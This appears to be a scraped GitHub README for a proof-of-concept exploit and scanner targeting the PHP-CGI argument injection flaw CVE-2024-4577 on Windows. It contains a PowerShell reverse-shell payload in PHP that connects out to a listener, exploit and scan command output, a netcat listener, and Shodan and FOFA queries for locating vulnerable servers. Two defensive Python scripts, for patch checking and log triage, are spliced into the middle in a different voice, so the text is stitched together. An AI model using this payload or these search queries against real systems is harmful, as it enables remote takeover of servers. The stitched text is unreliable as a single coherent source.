## https://sploitus.com/exploit?id=2E73CEBB-42AD-5E5F-89A5-87433F27C085
<h1 align="center">
  PHP CGI Argument Injection (CVE-2024-4577) RCE
</h1>

<p align="center">
    <a href="https://visitorbadge.io/status?path=https%3A%2F%2Fgithub.com%2Fl0n3m4n%2FCVE-2024-4577-RCE">
    <img src="https://api.visitorbadge.io/api/visitors?path=https%3A%2F%2Fgithub.com%2Fl0n3m4n%2FCVE-2024-4577-RCE&label=Visitors&countColor=%2337d67a" />
    </a>
    <a href="https://www.facebook.com/l0n3m4n">
        <img src="https://img.shields.io/badge/Facebook-%231877F2.svg?style=for-the-badge&logo=Facebook&logoColor=white" alt="Facebook">
    </a>
      <a href="https://www.twitter.com/l0n3m4n">
        <img src="https://img.shields.io/badge/Twitter-%23000000.svg?style=for-the-badge&logo=X&logoColor=white" alt="X">
    </a>
    <a href="https://medium.com/@l0n3m4n">
        <img src="https://img.shields.io/badge/Medium-12100E?style=for-the-badge&logo=medium&logoColor=white" alt="Medium">
    </a>
    <a href="https://www.python.org/">
    <img src="https://img.shields.io/badge/python-3670A0?style=for-the-badge&logo=python&logoColor=ffdd54" alt="Python">
    </a>
    <a href="https://www.kali.org/">
    <img src="https://img.shields.io/badge/Kali-268BEE?style=for-the-badge&logo=kalilinux&logoColor=white" alt="Kali">      
    </a>
</p>

## 📜 Description

In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.
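A patch-gap check against the affected ranges listed above, written as an added example (it is not code from this PoC or from PHP). It accepts a bare version, a `PHP/x.y.z` token or a whole `X-Powered-By` header line; the `assess` and `affected_hosts` names and the host labels are this example's own. A version inside a listed range only means the build lacks the fix: the description also requires Apache with PHP-CGI on Windows and an affected code page for the bug to be reachable, and a missing header (`expose_php=Off`) is reported as unknown rather than safe.

```python
import re

# Earliest patched release of each affected branch, from the description above.
FIXED_RELEASES = {
    (8, 1): (8, 1, 29),
    (8, 2): (8, 2, 20),
    (8, 3): (8, 3, 8),
}

_VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)\b")


def parse_php_version(text):
    """Return (major, minor, patch) from "8.2.19", "PHP/8.2.19" or a full
    "X-Powered-By: PHP/8.2.19" header line; None when no x.y.z version is present."""
    match = _VERSION_RE.search(text or "")
    if not match:
        return None
    return tuple(int(part) for part in match.groups())


def assess(text):
    """Classify a reported PHP version against the CVE-2024-4577 ranges.

    "affected": 8.1/8.2/8.3 build older than the fixed release for its branch
    "patched":  8.1/8.2/8.3 build at or above the fixed release
    "unknown":  no version found (e.g. header suppressed) or a branch the
                description does not list; treat as "needs a manual look", not safe
    """
    version = parse_php_version(text)
    if version is None:
        return "unknown"
    fixed = FIXED_RELEASES.get(version[:2])
    if fixed is None:
        return "unknown"
    return "affected" if version < fixed else "patched"


def affected_hosts(headers_by_host):
    """Given {hostname: X-Powered-By value}, return the hosts still on an
    affected build, sorted by name, for a patch-gap report."""
    return sorted(host for host, value in headers_by_host.items()
                  if assess(value) == "affected")


if __name__ == "__main__":
    # Constructed inventory for the demo, not real hosts.
    inventory = {
        "intranet-01": "PHP/8.2.19",
        "intranet-02": "PHP/8.2.20",
        "legacy-web":  "X-Powered-By: PHP/7.4.33",
        "hardened":    "",               # expose_php=Off: no version disclosed
    }
    for host, value in inventory.items():
        print(f"{host:12s} {assess(value)}")
    print("affected:", affected_hosts(inventory))
```

The comparison is done on integer tuples rather than on strings so that 8.2.9 sorts below 8.2.20; feed it the header values your inventory tool already collects, and follow up on every "unknown" by hand.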

"XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target an explicit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode."
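For the XAMPP endpoint the quote names, a defender's first question is whether anyone has been hitting it. The access-log triage below is an added example (not code from this repository) that flags two signals drawn from the description: direct requests to /php-cgi/php-cgi.exe, and PHP requests whose percent-decoded query string carries non-ASCII bytes, the kind of input that Best-Fit mapping can turn into command-line options. The log lines are constructed samples in Apache combined format; the field layout, the function names and the client addresses are this example's assumptions.

```python
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Default XAMPP CGI endpoint named in the description above.
CGI_BINARY = "/php-cgi/php-cgi.exe"

# Apache "combined" format (assumed layout):
# client ident user [time] "METHOD target PROTO" status size "referer" "agent"
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    match = _LOG_RE.match(line)
    return match.groupdict() if match else None


def query_has_non_ascii(target):
    """True when the percent-decoded query string contains any byte >= 0x80,
    i.e. characters that only reach the CGI command line after a code-page
    conversion (the Best-Fit step the description talks about)."""
    query = urlsplit(target).query
    return any(byte >= 0x80 for byte in unquote_to_bytes(query))


def classify(target):
    """Return the list of reasons a request target deserves a closer look
    (empty list for a request that raises neither signal)."""
    path = urlsplit(target).path.lower()
    reasons = []
    if path.endswith(CGI_BINARY):
        reasons.append("direct php-cgi.exe request")
    if (path.endswith(".php") or path.endswith(CGI_BINARY)) and query_has_non_ascii(target):
        reasons.append("non-ASCII bytes in query string")
    return reasons


def triage(lines):
    """Run classify() over log lines; return (client, target, reasons) for each hit."""
    hits = []
    for line in lines:
        record = parse_line(line)
        if record is None:
            continue
        reasons = classify(record["target"])
        if reasons:
            hits.append((record["ip"], record["target"], reasons))
    return hits


# Constructed sample log lines (not from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jun/2024:12:00:01 +0000] "GET /index.php?page=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Jun/2024:12:00:02 +0000] "POST /php-cgi/php-cgi.exe?%C3%A9x HTTP/1.1" 200 128 "-" "python-requests/2.31"',
    '10.0.0.9 - - [10/Jun/2024:12:00:03 +0000] "GET /index.php?q=%C3%A9 HTTP/1.1" 200 128 "-" "curl/8.0"',
    '10.0.0.7 - - [10/Jun/2024:12:00:04 +0000] "GET /php-cgi/php-cgi.exe HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for client, target, reasons in triage(SAMPLE_LOG):
        print(f"{client:10s} {target:40s} {'; '.join(reasons)}")
```

Non-ASCII query bytes on an ordinary .php URL are legitimate on many sites (search terms, names), so that signal is only worth alerting on where PHP actually runs as CGI; the direct php-cgi.exe hits are the stronger indicator and, once the /php-cgi/ alias is disabled in XAMPP or PHP is updated to a fixed release, they should drop to zero.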

## 📚 Table of Contents
- 📜 [Description](#-description)
- 🛠️ [Installation](#-installation)
- ⚙️ [Usage](#-usage)
- 💎 [References](#-references)
  
## 🛠️ Installation
```bash
$ git clone https://github.com/l0n3m4n/CVE-2024-4577-RCE.git
$ cd CVE-2024-4577-RCE && pip install -r requirements.txt 
```
## ⚙️ Usage

![php-cgi](/php-cgi.png)

## 🤖 Establishing reverse shell

### PHP Payload
> [!NOTE]
> This tool demonstrates realistic attack techniques (TTPs). However, this specific payload sample does not function in this scenario; modify shell.php to obtain a fully functional payload.
```php
<?php
// rev_shell.php
$payload = "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('192.168.56.100', 9001);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\";

exec($payload);
?>
 
```
## 🖥️ Scanning server
```bash
$ python3 CVE-2024-4577.py -s -t https://target.com/  
                                                   
 _____ _____ _____ _____ _____ _____                 _____       _         _   
|  _  |  |  |  _  |     |   __|     |___ ___ ___ ___|     |___  |_|___ ___| |_ 
|   __|     |   __|   --|  |  |-   -|___| .'|  _| . |-   -|   | | | -_|  _|  _|
|__|  |__|__|__|  |_____|_____|_____|   |__,|_| |_  |_____|_|_|_| |___|___|_|  
                                                |___|         |___|            
        Author: l0n3m4n | CVE-2024-4577 | PoC and Scanner                      
    
[+] Target https://target.com is vulnerable to CVE-2024-4577
```

## 🎯 Exploiting Vulnerable server
```bash
$ python3 CVE-2024-4577.py -t http://example.com -e -p rev_shell.php
                                                   
 _____ _____ _____ _____ _____ _____                 _____       _         _   
|  _  |  |  |  _  |     |   __|     |___ ___ ___ ___|     |___  |_|___ ___| |_ 
|   __|     |   __|   --|  |  |-   -|___| .'|  _| . |-   -|   | | | -_|  _|  _|
|__|  |__|__|__|  |_____|_____|_____|   |__,|_| |_  |_____|_|_|_| |___|___|_|  
                                                |___|         |___|            
        Author: l0n3m4n | CVE-2024-4577 | PoC and Scanner  

[+] Exploit successful!
```

## 👨🏻‍💻 Netcat Listener
```bash
$ nc -lvnp 9001
```

## 🔍 Discovering vulnerable host
- **Shodan**: `server: PHP 8.1`, `server: PHP 8.2`, `server: PHP 8.3`
- **FOFA**: `protocol="http" && header="X-Powered-By: PHP/8.1" || header="X-Powered-By: PHP/8.2" || header="X-Powered-By: PHP/8.3"`

## 💎 References
- https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577
- https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/http/cves/2024/CVE-2024-4577.yaml
- http://www.openwall.com/lists/oss-security/2024/06/07/1
- https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
- https://www.php.net/ChangeLog-8.php#8.1.29
- https://www.php.net/ChangeLog-8.php#8.2.20
- https://www.php.net/ChangeLog-8.php#8.3.8

## ⚠️ Disclaimer
This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by the tool. [create issue](https://github.com/l0n3m4n/CVE-2024-4577-RCE/issues)